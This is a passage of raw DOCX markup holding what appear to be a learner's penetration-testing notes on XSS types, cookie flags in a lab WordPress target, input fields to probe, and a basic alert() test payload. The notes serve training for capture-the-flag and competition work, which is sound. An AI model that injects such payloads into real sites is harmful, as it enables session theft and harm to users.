        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Understand XSS Types</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B97">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="622"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stored XSS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Malicious script is stored on the server (e.g., in databases, comments, or user profiles).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="622"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind XSS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Cross-Site Scripting) is a type of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stored XSS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> where the attacker injects malicious scripts into a web application, but the payload is not immediately executed in their own browser. Instead, it gets triggered later in a different context, typically when an administrator or another user with elevated privileges accesses the affected data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="622"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reflected XSS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Malicious script is reflected off the server, often via URL parameters or form inputs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B9A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="622"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then you send that URL to people and they open it and since there is a script in the URL, and the page displays the content in the URL, then the page will run that malicious script upon opening the page </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B9B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="622"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DOM-based XSS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: The vulnerability exists entirely on the client side due to JavaScript mishandling.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B9C">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX Book:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B9D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="671"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Websites use cookies to track</w:t>
      </w:r>
      <w:hyperlink r:id="rId928">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId929">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">state</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and information about users. Cookies can be set with several optional flags, including two that are particularly interesting to us as penetration testers: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HttpOnly</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B9E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="671"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The</w:t>
      </w:r>
      <w:hyperlink r:id="rId930">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId931">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Secure</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag instructs the browser to only send the cookie over encrypted connections, such as HTTPS. This protects the cookie from being sent in clear text and captured over the network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="671"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The</w:t>
      </w:r>
      <w:hyperlink r:id="rId932">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId933">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">HttpOnly</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag instructs the browser to deny JavaScript access to the cookie. If this flag is not set, we can use an XSS payload to steal the cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="671"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's verify the nature of WordPress' session cookies by first logging in as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="671"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we can open the Web Developer Tools, navigate to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Storage</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tab, then click on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://offsecwp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> under the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookies</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> menu on the left.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="671"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="812800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 29: Inspecting WordPress Cookies" id="269" name="image280.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 29: Inspecting WordPress Cookies" id="0" name="image280.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId934"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="812800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 29: Inspecting WordPress Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BA3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="671"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We notice that our browser has stored six different cookies, but only four are session cookies. Of these four cookies, if we exclude the negligible </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wordpress_test_cookie</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, all support the HttpOnly feature.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="671"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since all the session cookies can be sent only via HTTP, unfortunately, they also cannot be retrieved via JavaScript through our attack vector. We'll need to find a new angle.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BA5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BA6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BA7">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify Input Fields</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BA8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Locate areas where user input is accepted, such as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="232"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Search bars</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BAA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="232"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Comment sections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BAB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="232"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Forms</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BAC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="232"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">URL parameters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="232"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookies or HTTP headers (advanced)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BAE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BAF">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inject Basic XSS Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BB0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BB1">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stored XSS: Once you find one that works, you have to find a way to get the payload to trigger when someone else looks at the page. Like if you put it in the comments or user profile, then when they look, the payload will trigger</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BB2">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BB3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reflected XSS: This one is often when you find a URL parameter that is vulnerable, and then you share that link with others. Often not the solution for HTB, but it is a valid vulnerability in CPTC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BB4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BB5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start with simple scripts to see if they are reflected in the response without sanitization:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="654"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BB7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Test different tags if scripts are filtered:</w:t>
      </w:r>
    </w:p>
